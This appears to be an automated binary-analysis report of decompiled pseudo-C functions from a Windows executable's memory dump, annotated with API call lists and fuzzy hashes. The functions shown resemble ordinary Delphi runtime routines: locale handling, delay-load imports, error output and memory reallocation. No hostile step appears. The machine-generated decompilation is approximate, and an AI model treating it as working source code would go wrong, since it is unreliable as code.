                                                            			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				void* _t18;
                                                            				signed short _t28;
                                                            				intOrPtr _t35;
                                                            				intOrPtr* _t44;
                                                            				intOrPtr _t47;
                                                            
                                                            				_t42 = __edi;
                                                            				_push(0);
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_t44 = __edx;
                                                            				_t28 = __eax;
                                                            				_push(_t47);
                                                            				_push(0x40a8e8);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t47;
                                                            				EnterCriticalSection(0x4bdc10);
                                                            				if(_t28 !=  *0x4bdc28) {
                                                            					LeaveCriticalSection(0x4bdc10);
                                                            					E00407A20(_t44);
                                                            					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
                                                            						if( *0x4bdc0c == 0) {
                                                            							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
                                                            							L00403738();
                                                            							if(_t28 != _t18) {
                                                            								if( *_t44 != 0) {
                                                            									_t18 = E004086E4(_t44, E0040A900);
                                                            								}
                                                            								L00403738();
                                                            								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
                                                            								E004086E4(_t44, _v8);
                                                            							}
                                                            						} else {
                                                            							E0040A6C8(_t28, _t44);
                                                            						}
                                                            					}
                                                            					EnterCriticalSection(0x4bdc10);
                                                            					 *0x4bdc28 = _t28;
                                                            					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
                                                            					LeaveCriticalSection(0x4bdc10);
                                                            				} else {
                                                            					E0040858C(_t44, 0x55, 0x4bdc2a);
                                                            					LeaveCriticalSection(0x4bdc10);
                                                            				}
                                                            				_pop(_t35);
                                                            				 *[fs:eax] = _t35;
                                                            				_push(E0040A8EF);
                                                            				return E00407A20( &_v8);
                                                            			}










                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
                                                            • IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
                                                            • EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                            • String ID: en-US,en,
                                                            • API String ID: 975949045-3579323720
                                                            • Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                            • Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
                                                            • Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                            • Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
                                                            			E0042301C(void* __ebx, void* __esi, void* __eflags) {
                                                            				char _v8;
                                                            				void* _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				intOrPtr* _t21;
                                                            				intOrPtr _t61;
                                                            				void* _t68;
                                                            
                                                            				_push(__ebx);
                                                            				_v20 = 0;
                                                            				_v8 = 0;
                                                            				_push(_t68);
                                                            				_push(0x423116);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t68 + 0xfffffff0;
                                                            				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
                                                            				if(_t21 == 0) {
                                                            					if(E0041FF2C() != 2) {
                                                            						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
                                                            							E00422FE8();
                                                            							RegCloseKey(_v12);
                                                            						}
                                                            					} else {
                                                            						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
                                                            							E00422FE8();
                                                            							RegCloseKey(_v12);
                                                            						}
                                                            					}
                                                            					E0040873C( &_v20, _v8, 0x42322c);
                                                            					E00405920(_v20,  &_v16);
                                                            					if(_v16 != 0) {
                                                            					}
                                                            				} else {
                                                            					 *_t21();
                                                            				}
                                                            				_pop(_t61);
                                                            				 *[fs:eax] = _t61;
                                                            				_push(E0042311D);
                                                            				E00407A20( &_v20);
                                                            				return E00407A20( &_v8);
                                                            			}











                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressCloseHandleModuleProc
                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                            • API String ID: 4190037839-2401316094
                                                            • Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                            • Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
                                                            • Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                            • Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                            				long _v8;
                                                            				signed int _v12;
                                                            				long _v16;
                                                            				void* _v20;
                                                            				long _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v44;
                                                            				struct HINSTANCE__** _v48;
                                                            				CHAR* _v52;
                                                            				void _v56;
                                                            				long _v60;
                                                            				_Unknown_base(*)()* _v64;
                                                            				struct HINSTANCE__* _v68;
                                                            				CHAR* _v72;
                                                            				signed int _v76;
                                                            				CHAR* _v80;
                                                            				intOrPtr* _v84;
                                                            				void* _v88;
                                                            				void _v92;
                                                            				signed int _t104;
                                                            				signed int _t106;
                                                            				signed int _t108;
                                                            				long _t113;
                                                            				intOrPtr* _t119;
                                                            				void* _t124;
                                                            				void _t126;
                                                            				long _t128;
                                                            				struct HINSTANCE__* _t142;
                                                            				long _t166;
                                                            				signed int* _t190;
                                                            				_Unknown_base(*)()* _t191;
                                                            				void* _t194;
                                                            				intOrPtr _t196;
                                                            
                                                            				_push(_a4);
                                                            				memcpy( &_v56, 0x4b7c40, 8 << 2);
                                                            				_pop(_t194);
                                                            				_v56 =  *0x4b7c40;
                                                            				_v52 = E0040D6C8( *0x004B7C44);
                                                            				_v48 = E0040D6D8( *0x004B7C48);
                                                            				_v44 = E0040D6E8( *0x004B7C4C);
                                                            				_v40 = E0040D6F8( *0x004B7C50);
                                                            				_v36 = E0040D6F8( *0x004B7C54);
                                                            				_v32 = E0040D6F8( *0x004B7C58);
                                                            				_v28 =  *0x004B7C5C;
                                                            				memcpy( &_v92, 0x4b7c60, 9 << 2);
                                                            				_t196 = _t194;
                                                            				_v88 = 0x4b7c60;
                                                            				_v84 = _a8;
                                                            				_v80 = _v52;
                                                            				if((_v56 & 0x00000001) == 0) {
                                                            					_t166 =  *0x4b7c84; // 0x0
                                                            					_v8 = _t166;
                                                            					_v8 =  &_v92;
                                                            					RaiseException(0xc06d0057, 0, 1,  &_v8);
                                                            					return 0;
                                                            				}
                                                            				_t104 = _a8 - _v44;
                                                            				_t142 =  *_v48;
                                                            				if(_t104 < 0) {
                                                            					_t104 = _t104 + 3;
                                                            				}
                                                            				_v12 = _t104 >> 2;
                                                            				_t106 = _v12;
                                                            				_t190 = (_t106 << 2) + _v40;
                                                            				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
                                                            				_v76 = _t108;
                                                            				if(_t108 == 0) {
                                                            					_v72 =  *_t190 & 0x0000ffff;
                                                            				} else {
                                                            					_v72 = E0040D708( *_t190) + 2;
                                                            				}
                                                            				_t191 = 0;
                                                            				if( *0x4be640 == 0) {
                                                            					L10:
                                                            					if(_t142 != 0) {
                                                            						L25:
                                                            						_v68 = _t142;
                                                            						if( *0x4be640 != 0) {
                                                            							_t191 =  *0x4be640(2,  &_v92);
                                                            						}
                                                            						if(_t191 != 0) {
                                                            							L36:
                                                            							if(_t191 == 0) {
                                                            								_v60 = GetLastError();
                                                            								if( *0x4be644 != 0) {
                                                            									_t191 =  *0x4be644(4,  &_v92);
                                                            								}
                                                            								if(_t191 == 0) {
                                                            									_t113 =  *0x4b7c8c; // 0x0
                                                            									_v24 = _t113;
                                                            									_v24 =  &_v92;
                                                            									RaiseException(0xc06d007f, 0, 1,  &_v24);
                                                            									_t191 = _v64;
                                                            								}
                                                            							}
                                                            							goto L41;
                                                            						} else {
                                                            							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
                                                            								L35:
                                                            								_t191 = GetProcAddress(_t142, _v72);
                                                            								goto L36;
                                                            							} else {
                                                            								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
                                                            								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
                                                            									goto L35;
                                                            								} else {
                                                            									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
                                                            									if(_t191 == 0) {
                                                            										goto L35;
                                                            									}
                                                            									L41:
                                                            									 *_a8 = _t191;
                                                            									goto L42;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					if( *0x4be640 != 0) {
                                                            						_t142 =  *0x4be640(1,  &_v92);
                                                            					}
                                                            					if(_t142 == 0) {
                                                            						_t142 = LoadLibraryA(_v80);
                                                            					}
                                                            					if(_t142 != 0) {
                                                            						L20:
                                                            						if(_t142 == E0040CBA0(_v48, _t142)) {
                                                            							FreeLibrary(_t142);
                                                            						} else {
                                                            							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
                                                            								_t124 = LocalAlloc(0x40, 8);
                                                            								_v20 = _t124;
                                                            								if(_t124 != 0) {
                                                            									 *((intOrPtr*)(_v20 + 4)) = _t196;
                                                            									_t126 =  *0x4b7c3c; // 0x0
                                                            									 *_v20 = _t126;
                                                            									 *0x4b7c3c = _v20;
                                                            								}
                                                            							}
                                                            						}
                                                            						goto L25;
                                                            					} else {
                                                            						_v60 = GetLastError();
                                                            						if( *0x4be644 != 0) {
                                                            							_t142 =  *0x4be644(3,  &_v92);
                                                            						}
                                                            						if(_t142 != 0) {
                                                            							goto L20;
                                                            						} else {
                                                            							_t128 =  *0x4b7c88; // 0x0
                                                            							_v16 = _t128;
                                                            							_v16 =  &_v92;
                                                            							RaiseException(0xc06d007e, 0, 1,  &_v16);
                                                            							return _v64;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_t191 =  *0x4be640(0,  &_v92);
                                                            					if(_t191 == 0) {
                                                            						goto L10;
                                                            					} else {
                                                            						L42:
                                                            						if( *0x4be640 != 0) {
                                                            							_v60 = 0;
                                                            							_v68 = _t142;
                                                            							_v64 = _t191;
                                                            							 *0x4be640(5,  &_v92);
                                                            						}
                                                            						return _t191;
                                                            					}
                                                            				}
                                                            			}








































                                                            APIs
                                                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                            • Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
                                                            • Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                            • Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E004047B0(int __eax, void* __ecx, void* __edx) {
                                                            				long _v12;
                                                            				int _t4;
                                                            				long _t7;
                                                            				void* _t11;
                                                            				long _t12;
                                                            				void* _t13;
                                                            				long _t18;
                                                            
                                                            				_t4 = __eax;
                                                            				_t24 = __edx;
                                                            				_t20 = __eax;
                                                            				if( *0x4bb058 == 0) {
                                                            					_push(0x2010);
                                                            					_push(__edx);
                                                            					_push(__eax);
                                                            					_push(0);
                                                            					L00403780();
                                                            				} else {
                                                            					_t7 = E00407EF0(__edx);
                                                            					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
                                                            					_t11 =  *0x4b7078; // 0x403920
                                                            					_t12 = E00407EF0(_t11);
                                                            					_t13 =  *0x4b7078; // 0x403920
                                                            					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
                                                            					_t18 = E00407EF0(_t20);
                                                            					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
                                                            				}
                                                            				return _t4;
                                                            			}


                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
                                                            • WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
                                                            • GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
                                                            • WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: 9@
                                                            • API String ID: 3320372497-3209974744
                                                            • Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                            • Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
                                                            • Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                            • Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 62%
                                                            			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				char* _v8;
                                                            				long _v12;
                                                            				short _v140;
                                                            				short _v2188;
                                                            				void* _t15;
                                                            				char* _t17;
                                                            				intOrPtr _t19;
                                                            				intOrPtr _t30;
                                                            				long _t48;
                                                            				intOrPtr _t56;
                                                            				intOrPtr _t57;
                                                            				int _t61;
                                                            				void* _t64;
                                                            
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_v8 = 0;
                                                            				_push(_t64);
                                                            				_push(0x41f219);
                                                            				_push( *[fs:ecx]);
                                                            				 *[fs:ecx] = _t64 + 0xfffff778;
                                                            				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
                                                            				_t17 =  *0x4ba6c0; // 0x4bb058
                                                            				if( *_t17 == 0) {
                                                            					_t19 =  *0x4ba4f8; // 0x40e710
                                                            					_t11 = _t19 + 4; // 0xffed
                                                            					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40);
                                                            					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
                                                            				} else {
                                                            					_t30 =  *0x4ba524; // 0x4bb340
                                                            					E00405564(E00405820(_t30));
                                                            					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
                                                            					_push(_t48);
                                                            					E00409C00();
                                                            					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
                                                            					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
                                                            					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0);
                                                            				}
                                                            				_pop(_t56);
                                                            				 *[fs:eax] = _t56;
                                                            				_push(0x41f220);
                                                            				_t57 =  *0x41f0c4; // 0x41f0c8
                                                            				return E00409D24( &_v8, _t57);
                                                            			}


                                                            APIs
                                                              • Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                              • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                              • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                              • Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
                                                            • GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
                                                            • WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
                                                            • LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
                                                            • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                            • String ID:
                                                            • API String ID: 135118572-0
                                                            • Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                            • Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
                                                            • Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                            • Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
                                                            				signed int __ebx;
                                                            				void* __esi;
                                                            				signed int _t69;
                                                            				signed int _t78;
                                                            				signed int _t93;
                                                            				long _t94;
                                                            				void* _t100;
                                                            				signed int _t102;
                                                            				signed int _t109;
                                                            				signed int _t115;
                                                            				signed int _t123;
                                                            				signed int _t129;
                                                            				void* _t131;
                                                            				signed int _t140;
                                                            				unsigned int _t148;
                                                            				signed int _t150;
                                                            				long _t152;
                                                            				signed int _t156;
                                                            				intOrPtr _t161;
                                                            				signed int _t166;
                                                            				signed int _t170;
                                                            				unsigned int _t171;
                                                            				intOrPtr _t174;
                                                            				intOrPtr _t192;
                                                            				signed int _t195;
                                                            				signed int _t196;
                                                            				signed int _t197;
                                                            				void* _t205;
                                                            				unsigned int _t207;
                                                            				intOrPtr _t213;
                                                            				void* _t225;
                                                            				intOrPtr _t227;
                                                            				void* _t228;
                                                            				signed int _t230;
                                                            				void* _t232;
                                                            				signed int _t233;
                                                            				signed int _t234;
                                                            				signed int _t238;
                                                            				signed int _t241;
                                                            				void* _t243;
                                                            				intOrPtr* _t244;
                                                            
                                                            				_t176 = __edx;
                                                            				_t66 = __eax;
                                                            				_t166 =  *(__eax - 4);
                                                            				_t217 = __eax;
                                                            				if((_t166 & 0x00000007) != 0) {
                                                            					__eflags = _t166 & 0x00000005;
                                                            					if((_t166 & 0x00000005) != 0) {
                                                            						_pop(_t217);
                                                            						_pop(_t145);
                                                            						__eflags = _t166 & 0x00000003;
                                                            						if((_t166 & 0x00000003) == 0) {
                                                            							_push(_t145);
                                                            							_push(__eax);
                                                            							_push(__edi);
                                                            							_push(_t225);
                                                            							_t244 = _t243 + 0xffffffe0;
                                                            							_t218 = __edx;
                                                            							_t202 = __eax;
                                                            							_t69 =  *(__eax - 4);
                                                            							_t148 = (0xfffffff0 & _t69) - 0x14;
                                                            							if(0xfffffff0 >= __edx) {
                                                            								__eflags = __edx - _t148 >> 1;
                                                            								if(__edx < _t148 >> 1) {
                                                            									_t150 = E00403EE8(__edx);
                                                            									__eflags = _t150;
                                                            									if(_t150 != 0) {
                                                            										__eflags = _t218 - 0x40a2c;
                                                            										if(_t218 > 0x40a2c) {
                                                            											_t78 = _t202 - 0x10;
                                                            											__eflags = _t78;
                                                            											 *((intOrPtr*)(_t78 + 8)) = _t218;
                                                            										}
                                                            										E00403AA4(_t202, _t218, _t150);
                                                            										E0040426C(_t202, _t202, _t225);
                                                            									}
                                                            								} else {
                                                            									_t150 = __eax;
                                                            									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
                                                            								}
                                                            							} else {
                                                            								if(0xfffffff0 <= __edx) {
                                                            									_t227 = __edx;
                                                            								} else {
                                                            									_t227 = 0xbadb9d;
                                                            								}
                                                            								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
                                                            								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
                                                            								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
                                                            									L12:
                                                            									_t150 = E00403EE8(_t227);
                                                            									__eflags = _t150;
                                                            									if(_t150 != 0) {
                                                            										__eflags = _t227 - 0x40a2c;
                                                            										if(_t227 > 0x40a2c) {
                                                            											_t93 = _t150 - 0x10;
                                                            											__eflags = _t93;
                                                            											 *((intOrPtr*)(_t93 + 8)) = _t218;
                                                            										}
                                                            										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
                                                            										E0040426C(_t202, _t202, _t227);
                                                            									}
                                                            								} else {
                                                            									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
                                                            									_t94 =  *(_t244 + 0x10);
                                                            									if(_t218 - _t148 >= _t94) {
                                                            										goto L12;
                                                            									} else {
                                                            										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
                                                            										if(_t94 < _t152) {
                                                            											_t152 = _t94;
                                                            										}
                                                            										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
                                                            											goto L12;
                                                            										} else {
                                                            											_t100 = _t202 - 0x10;
                                                            											 *((intOrPtr*)(_t100 + 8)) = _t218;
                                                            											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
                                                            											_t150 = _t202;
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            							return _t150;
                                                            						} else {
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            					} else {
                                                            						_t170 = _t166 & 0xfffffff0;
                                                            						_push(__edi);
                                                            						_t205 = _t170 + __eax;
                                                            						_t171 = _t170 - 4;
                                                            						_t156 = _t166 & 0x0000000f;
                                                            						__eflags = __edx - _t171;
                                                            						_push(_t225);
                                                            						if(__edx > _t171) {
                                                            							_t102 =  *(_t205 - 4);
                                                            							__eflags = _t102 & 0x00000001;
                                                            							if((_t102 & 0x00000001) == 0) {
                                                            								L75:
                                                            								asm("adc edi, 0xffffffff");
                                                            								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
                                                            								_t207 = _t171;
                                                            								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
                                                            								_t192 = _t176;
                                                            								__eflags = _t109;
                                                            								if(_t109 == 0) {
                                                            									goto L73;
                                                            								} else {
                                                            									__eflags = _t228 - 0x40a2c;
                                                            									if(_t228 > 0x40a2c) {
                                                            										 *((intOrPtr*)(_t109 - 8)) = _t192;
                                                            									}
                                                            									_t230 = _t109;
                                                            									E00403A74(_t217, _t207, _t109);
                                                            									E0040426C(_t217, _t207, _t230);
                                                            									return _t230;
                                                            								}
                                                            							} else {
                                                            								_t115 = _t102 & 0xfffffff0;
                                                            								_t232 = _t171 + _t115;
                                                            								__eflags = __edx - _t232;
                                                            								if(__edx > _t232) {
                                                            									goto L75;
                                                            								} else {
                                                            									__eflags =  *0x4bb059;
                                                            									if(__eflags == 0) {
                                                            										L66:
                                                            										__eflags = _t115 - 0xb30;
                                                            										if(_t115 >= 0xb30) {
                                                            											E00403AC0(_t205);
                                                            											_t176 = _t176;
                                                            											_t171 = _t171;
                                                            										}
                                                            										asm("adc edi, 0xffffffff");
                                                            										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
                                                            										_t195 = _t232 + 4 - _t123;
                                                            										__eflags = _t195;
                                                            										if(_t195 > 0) {
                                                            											 *(_t217 + _t232 - 4) = _t195;
                                                            											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
                                                            											_t233 = _t123;
